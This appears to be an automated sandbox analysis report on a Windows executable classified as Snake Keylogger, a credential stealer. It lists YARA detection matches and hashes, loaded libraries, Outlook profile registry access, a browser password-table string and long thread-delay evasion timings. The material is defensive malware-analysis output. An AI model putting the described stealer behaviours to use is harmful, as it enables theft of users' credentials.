                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: z1PO7311145.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: z1PO7311145.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: z1PO7311145.exe, type: SAMPLEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                            Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                            Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess Stats: CPU usage > 49%
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DAD2780_2_02DAD278
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DA53620_2_02DA5362
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DAA0880_2_02DAA088
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DAC1480_2_02DAC148
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DA71180_2_02DA7118
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DAC7380_2_02DAC738
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DAC4680_2_02DAC468
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DACA080_2_02DACA08
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DAE9880_2_02DAE988
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DA69B00_2_02DA69B0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DACFAA0_2_02DACFAA
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DACCD80_2_02DACCD8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DA3AA10_2_02DA3AA1
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DA29EC0_2_02DA29EC
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DA39ED0_2_02DA39ED
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DAE97A0_2_02DAE97A
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DAF9610_2_02DAF961
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_02DA3E090_2_02DA3E09
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B31E800_2_06B31E80
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3DE000_2_06B3DE00
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B317A00_2_06B317A0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B39C700_2_06B39C70
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3FC680_2_06B3FC68
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B395480_2_06B39548
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B30B300_2_06B30B30
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B350280_2_06B35028
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B329680_2_06B32968
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3E6B00_2_06B3E6B0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3E6A00_2_06B3E6A0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B31E700_2_06B31E70
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3178F0_2_06B3178F
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3EF600_2_06B3EF60
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3EF510_2_06B3EF51
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3CCA00_2_06B3CCA0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3FC5E0_2_06B3FC5E
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3DDFF0_2_06B3DDFF
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3D5500_2_06B3D550
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3D5400_2_06B3D540
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3EAF80_2_06B3EAF8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3E2580_2_06B3E258
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3E24A0_2_06B3E24A
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3F3B80_2_06B3F3B8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B38BA00_2_06B38BA0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B38B960_2_06B38B96
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B39BFA0_2_06B39BFA
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B30B200_2_06B30B20
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B393280_2_06B39328
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3EB080_2_06B3EB08
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3D0F80_2_06B3D0F8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3D0E90_2_06B3D0E9
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B350220_2_06B35022
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3F8100_2_06B3F810
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3F8020_2_06B3F802
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B300060_2_06B30006
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B300400_2_06B30040
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3D9A80_2_06B3D9A8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3D9990_2_06B3D999
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B3295A0_2_06B3295A
                            Source: z1PO7311145.exe, 00000000.00000002.3694144020.000000000109E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs z1PO7311145.exe
                            Source: z1PO7311145.exe, 00000000.00000002.3693772784.0000000000F37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs z1PO7311145.exe
                            Source: z1PO7311145.exe, 00000000.00000000.1238289372.0000000000B76000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs z1PO7311145.exe
                            Source: z1PO7311145.exeBinary or memory string: OriginalFilenameRemington.exe4 vs z1PO7311145.exe
                            Source: z1PO7311145.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: z1PO7311145.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: z1PO7311145.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: z1PO7311145.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                            Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                            Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: z1PO7311145.exe, --U.csCryptographic APIs: 'TransformFinalBlock'
                            Source: z1PO7311145.exe, --U.csCryptographic APIs: 'TransformFinalBlock'
                            Source: z1PO7311145.exe, --.csCryptographic APIs: 'TransformFinalBlock'
                            Source: classification engineClassification label: mal100.troj.spyw.winEXE@1/0@4/4
                            Source: C:\Users\user\Desktop\z1PO7311145.exeMutant created: NULL
                            Source: z1PO7311145.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: z1PO7311145.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                            Source: C:\Users\user\Desktop\z1PO7311145.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.000000000316C000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003179000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003129000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003139000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003147000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: z1PO7311145.exeReversingLabs: Detection: 73%
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                            Source: z1PO7311145.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: z1PO7311145.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B39233 push es; ret 0_2_06B39244
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599889Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599781Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599672Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599547Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599437Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599328Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599219Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599094Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598984Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598875Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598765Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598656Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598546Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598437Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598328Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598218Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598109Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598000Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597890Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597781Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597672Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597560Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597453Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597344Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597234Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597125Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597016Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596906Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596797Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596687Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596578Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596469Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596359Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596250Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596141Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596016Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595891Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595781Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595672Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595562Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595453Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595333Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595134Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595030Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594921Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594800Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594685Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594578Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594469Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeWindow / User API: threadDelayed 2602Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeWindow / User API: threadDelayed 7248Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep count: 36 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 2412Thread sleep count: 2602 > 30Jump to behavior
